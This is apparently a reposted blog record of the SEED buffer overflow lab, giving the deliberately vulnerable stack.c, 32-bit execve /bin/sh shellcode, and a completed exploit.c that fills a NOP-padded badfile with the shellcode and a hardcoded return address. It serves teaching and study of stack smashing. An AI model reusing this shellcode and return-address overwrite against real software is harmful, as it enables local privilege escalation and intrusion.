当前位置:网站首页>Buffer overflow vulnerability lab experiment record
Buffer overflow vulnerability lab experiment record
2022-07-24 16:46:00 【SakamataZ】
A buffer overflow attack experiment , It's not very difficult , Take advantage of C Stack pointer storage principle . Here is a brief record .
Experiment official website address :http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/
List of articles
Disable address randomization
Program source code
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[24];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
const char code[] =
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
obtain str Initial address
therefore shellcode It should be placed in 0xbffff177+0x64=0xbffff1db
Use gdb Obtained by disassembly bof The return address is 0x24
So the program code is :
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer+100,shellcode); // take shellcode Copy to buffer
strcpy(buffer+0x24,"\xdb\xf1\xff\xbf"); // stay buffer The first four bytes at a specific offset cover sellcode Address
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
Function stack structure diagram
边栏推荐
- Codeforces round 690 (Div. 3) B. last year's substring conventional solution
- IP day 13 notes
- QT generation connection Library
- Implementation of side list menu (side menu) of wechat applet
- 1184. Distance between bus stops
- 我们为什么要推出Getaverse?
- Meeting OA project progress (II)
- JVM class loading subsystem
- thinkphp3.2.5无法跳转到外部链接
- Thinkphp3.2.5 cannot jump to external links
猜你喜欢
MySQL basic commands
AXI协议(2):AXI架构的五个通道和两种事务
QT generation connection Library
Creation and inheritance of JS class
15、ARM嵌入式系统:如何用PC调试单板
Development dynamics | stonedb 2022 release milestone
Envi SHP to ROI and mask the grid
Summary of experience in using.Net test framework xUnit, mstest, specflow
![为什么被调函数内部不能用 sizeof(arr) / size(arr[0]) 计算数组长度?](/img/e6/1d2213f3eb9bd0ff537a66d2b01f98.png)
为什么被调函数内部不能用 sizeof(arr) / size(arr[0]) 计算数组长度?
ARP 入门
随机推荐
JVM class loading subsystem
Unity camera free movement control
MODIS 16 day data monthly / quarterly synthesis
15. ARM embedded system: how to debug single board with PC
Concept of IP, classification of IP, IP multiplexing technology
QT keyboard event (II) -- long press the key to trigger the event event repeatedly, and the problem is solved
Codeforces round 690 (Div. 3) C. unique number conventional solution
Using native JS to realize magnifying glass function
How to effectively avoid memory leakage when customizing the handler?
2019q1 global smartphone shipments: Huawei vivo increased significantly, while Apple plummeted 30.2%!
Wentai technology's revenue in the first quarter soared by 184.6% year-on-year, and its net profit soared by 256.21%!
[technology] chat room demo of uniapp
Zcmu--5023: family division (C language)
EF LINQ Miscellany
双亲委派机制
With regard to performance testing, dry goods hit "suggestions collection"
Zhao Ming, CEO of glory: it is difficult for a single manufacturer to achieve full scene product coverage
ZCMU--5023: 家庭划分(C语言)
EF combined with sqlbulkcopy batch insert data
Codeworks round 693 (Div. 3) C. long jumps problem solution